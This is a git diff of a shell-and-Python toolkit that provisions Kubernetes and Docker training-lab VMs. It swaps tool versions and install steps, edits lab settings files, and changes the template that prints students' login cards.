--arg USER_LOGIN "$USER_LOGIN" --arg USER_PASSWORD "$USER_PASSWORD" '
{
"login": $USER_LOGIN,
"password": $USER_PASSWORD,
"ipaddrs": .
}' < tags/$TAG/clusters.tsv > tags/$TAG/logins.jsonl
echo cluster_ok > tags/$TAG/status
}
@@ -449,7 +391,7 @@ _cmd_docker() {
##VERSION## https://github.com/docker/compose/releases
COMPOSE_VERSION=v2.11.1
COMPOSE_PLATFORM='linux-$(uname -m)'
# Just in case you need Compose 1.X, you can use the following lines.
# (But it will probably only work for x86_64 machines.)
#COMPOSE_VERSION=1.29.2
@@ -478,23 +420,10 @@ _cmd_kubebins() {
TAG=$1
need_tag
if [ "$KUBEVERSION" = "" ]; then
KUBEVERSION="$(curl -fsSL https://cdn.dl.k8s.io/release/stable.txt | sed s/^v//)"
fi
##VERSION##
case "$KUBEVERSION" in
1.19.*)
ETCD_VERSION=v3.4.13
CNI_VERSION=v0.8.7
;;
*)
ETCD_VERSION=v3.5.10
CNI_VERSION=v1.3.0
;;
esac
K8SBIN_VERSION="v$KUBEVERSION"
ETCD_VERSION=v3.4.13
K8SBIN_VERSION=v1.19.11 # Can't go to 1.20 because it requires a serviceaccount signing key.
CNI_VERSION=v0.8.7
ARCH=${ARCHITECTURE-amd64}
pssh --timeout 300 "
set -e
@@ -518,41 +447,30 @@ _cmd_kubebins() {
"
}
_cmd kubepkgs "Install Kubernetes packages (kubectl, kubeadm, kubelet)"
_cmd_kubepkgs() {
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
_cmd_kube() {
TAG=$1
need_tag
# Prior September 2023, there was a single Kubernetes package repo that
# contained packages for all versions, so we could just add that repo
# and install whatever was the latest version available there.
# Things have changed (versions after September 2023, e.g. 1.28.3 are
# not in the old repo) and now there is a different repo for each
# minor version, so we need to figure out what minor version we are
# installing to add the corresponding repo.
if [ "$KUBEVERSION" = "" ]; then
KUBEVERSION="$(curl -fsSL https://cdn.dl.k8s.io/release/stable.txt | sed s/^v//)"
fi
KUBEREPOVERSION="$(echo $KUBEVERSION | cut -d. -f1-2)"
# Since the new repo doesn't have older versions, add a safety check here.
MINORVERSION="$(echo $KUBEVERSION | cut -d. -f2)"
if [ "$MINORVERSION" -lt 24 ]; then
die "Cannot install kubepkgs for versions before 1.24."
fi
pssh "
sudo tee /etc/apt/preferences.d/kubernetes <<EOF
if [ "$KUBEVERSION" ]; then
CLUSTER_CONFIGURATION_KUBERNETESVERSION='kubernetesVersion: "v'$KUBEVERSION'"'
pssh "
sudo tee /etc/apt/preferences.d/kubernetes <<EOF
Package: kubectl kubeadm kubelet
Pin: version $KUBEVERSION-*
Pin-Priority: 1000
EOF"
fi
# As of February 27th, 2023, packages.cloud.google.com seems broken
# (serves HTTP 500 errors for the GPG key), so let's pre-load that key.
pssh -I "sudo apt-key add -" < lib/kubernetes-apt-key.gpg
# Install packages
pssh --timeout 200 "
curl -fsSL https://pkgs.k8s.io/core:/stable:/v$KUBEREPOVERSION/deb/Release.key |
gpg --dearmor | sudo tee /etc/apt/keyrings/kubernetes-apt-keyring.gpg &&
echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v$KUBEREPOVERSION/deb/ /' |
#curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
#sudo apt-key add - &&
echo deb http://apt.kubernetes.io/ kubernetes-xenial main |
sudo tee /etc/apt/sources.list.d/kubernetes.list"
pssh --timeout 200 "
sudo apt-get update -q &&
@@ -560,21 +478,8 @@ EOF"
sudo apt-mark hold kubelet kubeadm kubectl &&
kubeadm completion bash | sudo tee /etc/bash_completion.d/kubeadm &&
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl &&
echo 'alias k=kubecolor' | sudo tee /etc/bash_completion.d/k &&
echo 'alias k=kubectl' | sudo tee /etc/bash_completion.d/k &&
echo 'complete -F __start_kubectl k' | sudo tee -a /etc/bash_completion.d/k"
}
_cmd kubeadm "Setup kubernetes clusters with kubeadm"
_cmd_kubeadm() {
TAG=$1
need_tag
if [ "$KUBEVERSION" ]; then
CLUSTER_CONFIGURATION_KUBERNETESVERSION='kubernetesVersion: "v'$KUBEVERSION'"'
IGNORE_SYSTEMVERIFICATION="- SystemVerification"
IGNORE_SWAP="- Swap"
IGNORE_IPTABLES="- FileContent--proc-sys-net-bridge-bridge-nf-call-iptables"
fi
# Install a valid configuration for containerd
# (first, the CRI interface needs to be re-enabled;
@@ -595,9 +500,6 @@ bootstrapTokens:
nodeRegistration:
ignorePreflightErrors:
- NumCPU
$IGNORE_SYSTEMVERIFICATION
$IGNORE_SWAP
$IGNORE_IPTABLES
---
kind: JoinConfiguration
apiVersion: kubeadm.k8s.io/v1beta3
@@ -609,9 +511,6 @@ discovery:
nodeRegistration:
ignorePreflightErrors:
- NumCPU
$IGNORE_SYSTEMVERIFICATION
$IGNORE_SWAP
$IGNORE_IPTABLES
---
kind: KubeletConfiguration
apiVersion: kubelet.config.k8s.io/v1beta1
@@ -640,9 +539,7 @@ EOF
# Install weave as the pod network
pssh "
if i_am_first_node; then
curl -fsSL https://github.com/weaveworks/weave/releases/download/v2.8.1/weave-daemonset-k8s-1.11.yaml |
sed s,weaveworks/weave,quay.io/rackspace/weave, |
kubectl apply -f-
kubectl apply -f https://github.com/weaveworks/weave/releases/download/v2.8.1/weave-daemonset-k8s-1.11.yaml
fi"
# FIXME this is a gross hack to add the deployment key to our SSH agent,
@@ -696,31 +593,6 @@ _cmd_kubetools() {
;;
esac
# Install ArgoCD CLI
##VERSION## https://github.com/argoproj/argo-cd/releases/latest
URL=https://github.com/argoproj/argo-cd/releases/latest/download/argocd-linux-${ARCH}
pssh "
if [ ! -x /usr/local/bin/argocd ]; then
sudo curl -o /usr/local/bin/argocd -fsSL $URL
sudo chmod +x /usr/local/bin/argocd
argocd completion bash | sudo tee /etc/bash_completion.d/argocd
argocd version --client
fi"
# Install Flux CLI
##VERSION## https://github.com/fluxcd/flux2/releases
FLUX_VERSION=2.3.0
FILENAME=flux_${FLUX_VERSION}_linux_${ARCH}
URL=https://github.com/fluxcd/flux2/releases/download/v$FLUX_VERSION/$FILENAME.tar.gz
pssh "
if [ ! -x /usr/local/bin/flux ]; then
curl -fsSL $URL |
sudo tar -C /usr/local/bin -zx flux
sudo chmod +x /usr/local/bin/flux
flux completion bash | sudo tee /etc/bash_completion.d/flux
flux --version
fi"
# Install kubectx and kubens
pssh "
set -e
@@ -752,7 +624,7 @@ EOF
# Install stern
##VERSION## https://github.com/stern/stern/releases
STERN_VERSION=1.29.0
STERN_VERSION=1.22.0
FILENAME=stern_${STERN_VERSION}_linux_${ARCH}
URL=https://github.com/stern/stern/releases/download/v$STERN_VERSION/$FILENAME.tar.gz
pssh "
@@ -774,7 +646,7 @@ EOF
# Install kustomize
##VERSION## https://github.com/kubernetes-sigs/kustomize/releases
KUSTOMIZE_VERSION=v5.4.1
KUSTOMIZE_VERSION=v4.5.7
URL=https://github.com/kubernetes-sigs/kustomize/releases/download/kustomize/${KUSTOMIZE_VERSION}/kustomize_${KUSTOMIZE_VERSION}_linux_${ARCH}.tar.gz
pssh "
if [ ! -x /usr/local/bin/kustomize ]; then
@@ -805,16 +677,6 @@ EOF
aws-iam-authenticator version
fi"
# Install jless (jless.io)
pssh "
if [ ! -x /usr/local/bin/jless ]; then
##VERSION##
sudo apt-get install -y libxcb-render0 libxcb-shape0 libxcb-xfixes0
wget https://github.com/PaulJuliusMartinez/jless/releases/download/v0.9.0/jless-v0.9.0-x86_64-unknown-linux-gnu.zip
unzip jless-v0.9.0-x86_64-unknown-linux-gnu
sudo mv jless /usr/local/bin
fi"
# Install the krew package manager
pssh "
if [ ! -d /home/$USER_LOGIN/.krew ]; then
@@ -826,31 +688,21 @@ EOF
echo export PATH=/home/$USER_LOGIN/.krew/bin:\\\$PATH | sudo -u $USER_LOGIN tee -a /home/$USER_LOGIN/.bashrc
fi"
# Install kubecolor
KUBECOLOR_VERSION=0.4.0
URL=https://github.com/kubecolor/kubecolor/releases/download/v${KUBECOLOR_VERSION}/kubecolor_${KUBECOLOR_VERSION}_linux_${ARCH}.tar.gz
pssh "
if [ ! -x /usr/local/bin/kubecolor ]; then
##VERSION##
curl -fsSL $URL |
sudo tar -C /usr/local/bin -zx kubecolor
fi"
# Install k9s
pssh "
if [ ! -x /usr/local/bin/k9s ]; then
FILENAME=k9s_Linux_$ARCH.tar.gz &&
curl -fsSL https://github.com/derailed/k9s/releases/latest/download/\$FILENAME |
sudo tar -C /usr/local/bin -zx k9s
sudo tar -zxvf- -C /usr/local/bin k9s
k9s version
fi"
# Install popeye
pssh "
if [ ! -x /usr/local/bin/popeye ]; then
FILENAME=popeye_Linux_$ARCH.tar.gz &&
FILENAME=popeye_Linux_$HERP_DERP_ARCH.tar.gz &&
curl -fsSL https://github.com/derailed/popeye/releases/latest/download/\$FILENAME |
sudo tar -C /usr/local/bin -zx popeye
sudo tar -zxvf- -C /usr/local/bin popeye
popeye version
fi"
@@ -860,10 +712,10 @@ EOF
# But the install script is not arch-aware (see https://github.com/tilt-dev/tilt/pull/5050).
pssh "
if [ ! -x /usr/local/bin/tilt ]; then
TILT_VERSION=0.33.13
TILT_VERSION=0.22.15
FILENAME=tilt.\$TILT_VERSION.linux.$TILT_ARCH.tar.gz
curl -fsSL https://github.com/tilt-dev/tilt/releases/download/v\$TILT_VERSION/\$FILENAME |
sudo tar -C /usr/local/bin -zx tilt
sudo tar -zxvf- -C /usr/local/bin tilt
tilt completion bash | sudo tee /etc/bash_completion.d/tilt
tilt version
fi"
@@ -905,8 +757,7 @@ EOF
fi"
##VERSION## https://github.com/bitnami-labs/sealed-secrets/releases
KUBESEAL_VERSION=0.26.2
URL=https://github.com/bitnami-labs/sealed-secrets/releases/download/v${KUBESEAL_VERSION}/kubeseal-${KUBESEAL_VERSION}-linux-${ARCH}.tar.gz
KUBESEAL_VERSION=0.17.4
#case $ARCH in
#amd64) FILENAME=kubeseal-linux-amd64;;
#arm64) FILENAME=kubeseal-arm64;;
@@ -914,13 +765,13 @@ EOF
#esac
pssh "
if [ ! -x /usr/local/bin/kubeseal ]; then
curl -fsSL $URL |
sudo tar -C /usr/local/bin -zx kubeseal
curl -fsSL https://github.com/bitnami-labs/sealed-secrets/releases/download/v$KUBESEAL_VERSION/kubeseal-$KUBESEAL_VERSION-linux-$ARCH.tar.gz |
sudo tar -zxvf- -C /usr/local/bin kubeseal
kubeseal --version
fi"
##VERSION## https://github.com/vmware-tanzu/velero/releases
VELERO_VERSION=1.13.2
VELERO_VERSION=1.11.0
pssh "
if [ ! -x /usr/local/bin/velero ]; then
curl -fsSL https://github.com/vmware-tanzu/velero/releases/download/v$VELERO_VERSION/velero-v$VELERO_VERSION-linux-$ARCH.tar.gz |
@@ -930,21 +781,13 @@ EOF
fi"
##VERSION## https://github.com/doitintl/kube-no-trouble/releases
KUBENT_VERSION=0.7.2
KUBENT_VERSION=0.7.0
pssh "
if [ ! -x /usr/local/bin/kubent ]; then
curl -fsSL https://github.com/doitintl/kube-no-trouble/releases/download/${KUBENT_VERSION}/kubent-${KUBENT_VERSION}-linux-$ARCH.tar.gz |
sudo tar -zxvf- -C /usr/local/bin kubent
kubent --version
fi"
# Ngrok. Note that unfortunately, this is the x86_64 binary.
# We might have to rethink how to handle this for multi-arch environments.
pssh "
if [ ! -x /usr/local/bin/ngrok ]; then
curl -fsSL https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz |
sudo tar -zxvf- -C /usr/local/bin ngrok
fi"
}
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
@@ -992,15 +835,6 @@ _cmd_inventory() {
FIXME
}
_cmd logins "Show login information for a group of instances"
_cmd_logins() {
TAG=$1
need_tag $TAG
cat tags/$TAG/logins.jsonl \
| jq -r '"\(if .codeServerPort then "\(.codeServerPort)\t" else "" end )\(.password)\tssh -l \(.login)\(if .port then " -p \(.port)" else "" end)\t\(.ipaddrs)"'
}
_cmd maketag "Generate a quasi-unique tag for a group of instances"
_cmd_maketag() {
if [ -z $USER ]; then
@@ -1051,9 +885,6 @@ _cmd_stage2() {
cd tags/$TAG/stage2
terraform init -upgrade
terraform apply -auto-approve
terraform output -raw logins_jsonl > ../logins.jsonl
terraform output -raw ips_txt > ../ips.txt
echo "stage2_ok" > status
}
_cmd standardize "Deal with non-standard Ubuntu cloud images"
@@ -1090,19 +921,12 @@ _cmd_standardize() {
# Disable unattended upgrades so that they don't mess up with the subsequent steps
pssh sudo rm -f /etc/apt/apt.conf.d/50unattended-upgrades
# Some cloud providers think that it's smart to disable password authentication.
# We need to re-neable it, though.
# Digital Ocecan
# Digital Ocean's cloud init disables password authentication; re-enable it.
pssh "
if [ -f /etc/ssh/sshd_config.d/50-cloud-init.conf ]; then
sudo rm /etc/ssh/sshd_config.d/50-cloud-init.conf
sudo systemctl restart ssh.service
fi"
# AWS
pssh "if [ -f /etc/ssh/sshd_config.d/60-cloudimg-settings.conf ]; then
sudo rm /etc/ssh/sshd_config.d/60-cloudimg-settings.conf
sudo systemctl restart ssh.service
fi"
# Special case for oracle since their iptables blocks everything but SSH
pssh "
@@ -1138,12 +962,11 @@ _cmd_tailhist () {
# halfway through and we're actually trying to download it again.
pssh "
set -e
sudo apt-get install unzip -y
wget -c https://github.com/joewalnes/websocketd/releases/download/v0.3.0/websocketd-0.3.0-linux_$ARCH.zip
unzip -o websocketd-0.3.0-linux_$ARCH.zip websocketd
unzip websocketd-0.3.0-linux_$ARCH.zip websocketd
sudo mv websocketd /usr/local/bin/websocketd
sudo mkdir -p /opt/tailhist
sudo tee /opt/tailhist.service <<EOF
sudo mkdir -p /tmp/tailhist
sudo tee /root/tailhist.service <<EOF
[Unit]
Description=tailhist
@@ -1151,36 +974,16 @@ Description=tailhist
WantedBy=multi-user.target
[Service]
WorkingDirectory=/opt/tailhist
WorkingDirectory=/tmp/tailhist
ExecStart=/usr/local/bin/websocketd --port=1088 --staticdir=. sh -c \"tail -n +1 -f /home/$USER_LOGIN/.history || echo 'Could not read history file. Perhaps you need to \\\"chmod +r .history\\\"?'\"
User=nobody
Group=nogroup
Restart=always
EOF
sudo systemctl enable /opt/tailhist.service --now
sudo systemctl enable /root/tailhist.service --now
"
pssh -I sudo tee /opt/tailhist/index.html <lib/tailhist.html
}
_cmd terraform "Apply Terraform configuration to provision resources."
_cmd_terraform() {
TAG=$1
need_tag
echo terraforming > tags/$TAG/status
(
cd tags/$TAG
terraform apply -auto-approve
# The Terraform provider for Proxmox has a bug; sometimes it fails
# to obtain VM address from the QEMU agent. In that case, we put
# ERROR in the ips.txt file (instead of the VM IP address). Detect
# that so that we run Terraform again (this typically solves the issue).
if grep -q ERROR ips.txt; then
die "Couldn't obtain IP address of some machines. Try to re-run terraform."
fi
)
echo terraformed > tags/$TAG/status
pssh -I sudo tee /tmp/tailhist/index.html <lib/tailhist.html
}
_cmd tools "Install a bunch of useful tools (editors, git, jq...)"
@@ -1189,9 +992,8 @@ _cmd_tools() {
need_tag
pssh "
set -e
sudo apt-get -q update
sudo apt-get -qy install apache2-utils argon2 emacs-nox git httping htop jid joe jq mosh tree unzip
sudo apt-get -qy install apache2-utils emacs-nox git httping htop jid joe jq mosh python-setuptools tree unzip
# This is for VMs with broken PRNG (symptom: running docker-compose randomly hangs)
sudo apt-get -qy install haveged
"
@@ -1238,17 +1040,14 @@ fi
"
}
_cmd ssh "Open an SSH session to a node (first one by default)"
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
if [ "$2" ]; then
ssh -l ubuntu -i tags/$TAG/id_rsa $2
else
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP (default password: $USER_PASSWORD)"
ssh $SSHOPTS $USER_LOGIN@$IP
fi
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP (default password: $USER_PASSWORD)"
ssh $SSHOPTS $USER_LOGIN@$IP
}
_cmd tags "List groups of VMs known locally"
@@ -1257,8 +1056,8 @@ _cmd_tags() {
cd tags
echo "[#] [Status] [Tag] [Mode] [Provider]"
for tag in *; do
if [ -f $tag/logins.jsonl ]; then
count="$(wc -l < $tag/logins.jsonl)"
if [ -f $tag/ips.txt ]; then
count="$(wc -l < $tag/ips.txt)"
else
count="?"
fi
@@ -1334,13 +1133,7 @@ _cmd_passwords() {
$0 ips "$TAG" | paste "$PASSWORDS_FILE" - | while read password nodes; do
info "Setting password for $nodes..."
for node in $nodes; do
echo $USER_LOGIN $password | ssh $SSHOPTS -i tags/$TAG/id_rsa ubuntu@$node '
read login password
echo $login:$password | sudo chpasswd
hashedpassword=$(echo -n $password | argon2 saltysalt$RANDOM -e)
sudo -u $login mkdir -p /home/$login/.config/code-server
echo "hashed-password: \"$hashedpassword\"" | sudo -u $login tee /home/$login/.config/code-server/config.yaml >/dev/null
'
echo $USER_LOGIN:$password | ssh $SSHOPTS -i tags/$TAG/id_rsa ubuntu@$node sudo chpasswd
done
done
info "Done."
@@ -1372,11 +1165,6 @@ _cmd_wait() {
pssh -l $SSH_USER "
if [ -d /var/lib/cloud ]; then
cloud-init status --wait
case $? in
0) exit 0;; # all is good
2) exit 0;; # recoverable error (happens with proxmox deprecated cloud-init payloads)
*) exit 1;; # all other problems
esac
fi"
}
@@ -1419,7 +1207,7 @@ WantedBy=multi-user.target
[Service]
WorkingDirectory=/opt/webssh
ExecStart=/usr/bin/env python3 run.py --fbidhttp=false --port=1080 --policy=reject
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
User=nobody
Group=nogroup
Restart=always
@@ -1432,7 +1220,7 @@ EOF"
_cmd www "Run a web server to access card HTML and PDF"
_cmd_www() {
cd www
IPADDR=$(curl -fsSL canihazip.com/s || echo localhost)
IPADDR=$(curl -sL canihazip.com/s)
info "The following files are available:"
for F in *; do
echo "http://$IPADDR:8000/$F"

View File

@@ -1,22 +1,32 @@
#!/usr/bin/env python3
import json
import os
import sys
import yaml
import jinja2
# Read settings from user-provided settings file
context = yaml.safe_load(open(sys.argv[1]))
context["logins"] = []
for line in open("logins.jsonl"):
if line.strip():
context["logins"].append(json.loads(line))
ips = list(open("ips.txt"))
clustersize = context["clustersize"]
print("---------------------------------------------")
print(" Number of cards: {}".format(len(context["logins"])))
print(" Number of IPs: {}".format(len(ips)))
print(" VMs per cluster: {}".format(clustersize))
print("---------------------------------------------")
assert len(ips)%clustersize == 0
clusters = []
while ips:
cluster = ips[:clustersize]
ips = ips[clustersize:]
clusters.append(cluster)
context["clusters"] = clusters
template_file_name = context["cards_template"]
template_file_path = os.path.join(
os.path.dirname(__file__),
@@ -25,23 +35,23 @@ template_file_path = os.path.join(
template_file_name
)
template = jinja2.Template(open(template_file_path).read())
with open("cards.html", "w") as f:
f.write(template.render(**context))
print("Generated cards.html")
with open("ips.html", "w") as f:
f.write(template.render(**context))
print("Generated ips.html")
try:
import pdfkit
paper_size = context["paper_size"]
margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
with open("cards.html") as f:
pdfkit.from_file(f, "cards.pdf", options={
with open("ips.html") as f:
pdfkit.from_file(f, "ips.pdf", options={
"page-size": paper_size,
"margin-top": margin,
"margin-bottom": margin,
"margin-left": margin,
"margin-right": margin,
})
print("Generated cards.pdf")
print("Generated ips.pdf")
except ImportError:
print("WARNING: could not import pdfkit; did not generate cards.pdf")
print("WARNING: could not import pdfkit; did not generate ips.pdf")

Binary file not shown.

View File

@@ -17,20 +17,6 @@ pssh() {
echo "[parallel-ssh] $@"
# There are some routers that really struggle with the number of TCP
# connections that we open when deploying large fleets of clusters.
# We're adding a 1 second delay here, but this can be cranked up if
# necessary - or down to zero, too.
sleep ${PSSH_DELAY_PRE-1}
# When things go wrong, it's convenient to ask pssh to show the output
# of the failed command. Let's make that easy with a DEBUG env var.
if [ "$DEBUG" ]; then
PSSH_I=-i
else
PSSH_I=""
fi
$(which pssh || which parallel-ssh) -h $HOSTFILE -l ubuntu \
--par ${PSSH_PARALLEL_CONNECTIONS-100} \
--timeout 300 \
@@ -39,6 +25,5 @@ pssh() {
-O UserKnownHostsFile=/dev/null \
-O StrictHostKeyChecking=no \
-O ForwardAgent=yes \
$PSSH_I \
"$@"
}

View File

@@ -1,16 +0,0 @@
#!/bin/sh
DOMAINS=domains.txt
IPS=ips.txt
. ./dns-cloudflare.sh
paste "$DOMAINS" "$IPS" | while read domain ips; do
if ! [ "$domain" ]; then
echo "⚠️ No more domains!"
exit 1
fi
_clear_zone "$domain"
_populate_zone "$domain" $ips
done
echo "✅ All done."

View File

@@ -1,21 +1,21 @@
CLUSTERSIZE=3
CLUSTERSIZE=1
CLUSTERPREFIX=polykube
CLUSTERPREFIX=dmuc
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
tools
kubepkgs
kubebins
docker
disabledocker
createuser
webssh
tailhist
kubebins
kubetools
ips
"

View File

@@ -7,7 +7,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize

View File

@@ -7,7 +7,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize

View File

@@ -1,27 +0,0 @@
CLUSTERSIZE=1
CLUSTERPREFIX=monokube
# We're sticking to this in the first DMUC lab,
# because it still works with Docker, and doesn't
# require a ServiceAccount signing key.
KUBEVERSION=1.19.11
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
tools
docker
disabledocker
createuser
webssh
tailhist
kubebins
kubetools
ips
"

View File

@@ -7,10 +7,9 @@ USER_PASSWORD=training
# For a list of old versions, check:
# https://kubernetes.io/releases/patch-releases/#non-active-branch-history
KUBEVERSION=1.28.9
KUBEVERSION=1.22.5
STEPS="
terraform
wait
standardize
clusterize
@@ -19,8 +18,7 @@ STEPS="
createuser
webssh
tailhist
kubepkgs
kubeadm
kube
kubetools
kubetest
"

View File

@@ -6,7 +6,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
@@ -15,8 +14,7 @@ STEPS="
createuser
webssh
tailhist
kubepkgs
kubeadm
kube
kubetools
kubetest
"
"

View File

@@ -6,7 +6,6 @@ USER_LOGIN=docker
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
@@ -15,5 +14,6 @@ STEPS="
createuser
webssh
tailhist
cards
ips
"
"

View File

@@ -1,6 +0,0 @@
CLUSTERSIZE=5
USER_LOGIN=k8s
USER_PASSWORD=
STEPS="terraform stage2"

View File

@@ -6,7 +6,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
@@ -15,8 +14,7 @@ STEPS="
createuser
webssh
tailhist
kubepkgs
kubeadm
kube
kubetools
kubetest
"
"

View File

@@ -7,7 +7,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
@@ -16,8 +15,7 @@ STEPS="
createuser
webssh
tailhist
kubepkgs
kubeadm
kube
kubetools
kubetest
"

View File

@@ -1,4 +1,6 @@
CLUSTERSIZE=2
USER_LOGIN=k8s
USER_PASSWORD=
STEPS="terraform stage2"
STEPS="stage2"

View File

@@ -1,8 +1,3 @@
#export TF_VAR_node_size=GP4.4
#export TF_VAR_node_size=g6-standard-6
#export TF_VAR_node_size=m7i.xlarge
CLUSTERSIZE=1
CLUSTERPREFIX=CHANGEME
@@ -11,7 +6,6 @@ USER_LOGIN=portal
USER_PASSWORD=CHANGEME
STEPS="
terraform
wait
standardize
clusterize

View File

@@ -7,7 +7,7 @@ STUDENTS=2
#export TF_VAR_location=eu-north-1
export TF_VAR_node_size=S
SETTINGS=admin-monokube
SETTINGS=admin-dmuc
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
@@ -15,7 +15,15 @@ TAG=$PREFIX-$SETTINGS
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-polykube
SETTINGS=admin-kubenet
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-kuberouter
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \

View File

@@ -7,7 +7,7 @@
{%- set url = url
| default("http://FIXME.container.training/") -%}
{%- set pagesize = pagesize
| default(10) -%}
| default(9) -%}
{%- set lang = lang
| default("en") -%}
{%- set event = event
@@ -15,36 +15,79 @@
{%- set backside = backside
| default(False) -%}
{%- set image = image
| default(False) -%}
| default("kube") -%}
{%- set clusternumber = clusternumber
| default(None) -%}
{%- set thing = thing
| default("lab environment") -%}
{%- if lang == "en" -%}
{%- set intro -%}
Here is the connection information to your very own
{{ thing }} for this {{ event }}.
You can connect to it with any SSH client.
{%- endset -%}
{%- if qrcode == True -%}
{%- set qrcode = "https://container.training/q" -%}
{%- elif qrcode -%}
{%- set qrcode = qrcode -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
{{ thing }} pour cette formation.
Vous pouvez vous y connecter
avec n'importe quel client SSH.
{%- endset -%}
{# You can also set img_bottom_src instead. #}
{%- set img_logo_src = {
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
"kube": "https://avatars1.githubusercontent.com/u/13629408",
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
}[image] -%}
{%- if lang == "en" and clustersize == 1 -%}
{%- set intro -%}
Here is the connection information to your very own
machine for this {{ event }}.
You can connect to this VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machine is:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clustersize != 1 -%}
{%- set intro -%}
Here is the connection information to your very own
cluster for this {{ event }}.
You can connect to each VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machines are:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize == 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
machine pour cette formation.
Vous pouvez vous connecter à cette machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresse IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clusterprefix != "node" -%}
{%- set intro -%}
Here is the connection information for the
<strong>{{ clusterprefix }}</strong> environment.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize != 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
cluster pour cette formation.
Vous pouvez vous connecter à chaque machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresses IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
@@ -59,21 +102,25 @@
}
body {
/* this is A4 minus 0.5cm margins */
width: 20cm;
height: 28.7cm;
width: 20cm;
height: 28.7cm;
}
{% elif paper_size == "Letter" %}
@page {
size: Letter; /* 8.5in x 11in */
size: Letter;
margin: 0.2in;
}
body {
width: 6.75in; /* two cards wide */
margin-left: 0.875in; /* (8.5in - 6.75in)/2 */
margin-top: 0.1875in; /* (11in - 5 cards)/2 */
/* this is Letter minus 0.2in margins */
width: 8.6in;
heigth: 10.6in;
}
{% endif %}
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 15px;
font-family: 'Slabo 27px';
@@ -87,45 +134,47 @@ table {
padding-left: 0.4em;
}
td:first-child {
width: 10.5em;
}
div.card {
div {
float: left;
border: 0.01in dotted black;
border: 1px dotted black;
{% if backside %}
height: 33%;
{% endif %}
/* columns * (width+left+right) < 100% */
/*
columns * (width+left+right) < 100%
height: 33%;
width: 24.8%;
width: 33%;
width: 24.8%;
*/
width: 3.355in; /* 3.375in minus two 0.01in borders */
height: 2.105in; /* 2.125in minus two 0.01in borders */
/**/
width: 33%;
/**/
}
p {
margin: 0.8em;
}
div.front {
{% if image %}
background-image: url("{{ image }}");
background-repeat: no-repeat;
background-size: 1in;
background-position-x: 2.8in;
background-position-y: center;
{% endif %}
div.back {
border: 1px dotted grey;
}
span.scale {
white-space: nowrap;
white-space: nowrap;
}
img.logo {
height: 4.5em;
float: right;
}
img.bottom {
height: 2.5em;
display: block;
margin: 0.5em auto;
}
.qrcode img {
height: 5.8em;
padding: 1em 1em 0.5em 1em;
float: left;
width: 40%;
margin: 1em;
}
.logpass {
@@ -140,97 +189,101 @@ span.scale {
height: 0;
}
</style>
<script type="text/javascript" src="qrcode.min.js"></script>
<script type="text/javascript" src="https://cdn.rawgit.com/davidshimjs/qrcodejs/gh-pages/qrcode.min.js"></script>
<script type="text/javascript">
function qrcodes() {
[].forEach.call(
document.getElementsByClassName("qrcode"),
(e, index) => {
new QRCode(e, {
text: "{{ qrcode }}",
correctLevel: QRCode.CorrectLevel.L
});
}
);
[].forEach.call(
document.getElementsByClassName("qrcode"),
(e, index) => {
new QRCode(e, {
text: "{{ qrcode }}",
correctLevel: QRCode.CorrectLevel.L
});
}
);
}
function scale() {
[].forEach.call(
document.getElementsByClassName("scale"),
(e, index) => {
var text_width = e.getBoundingClientRect().width;
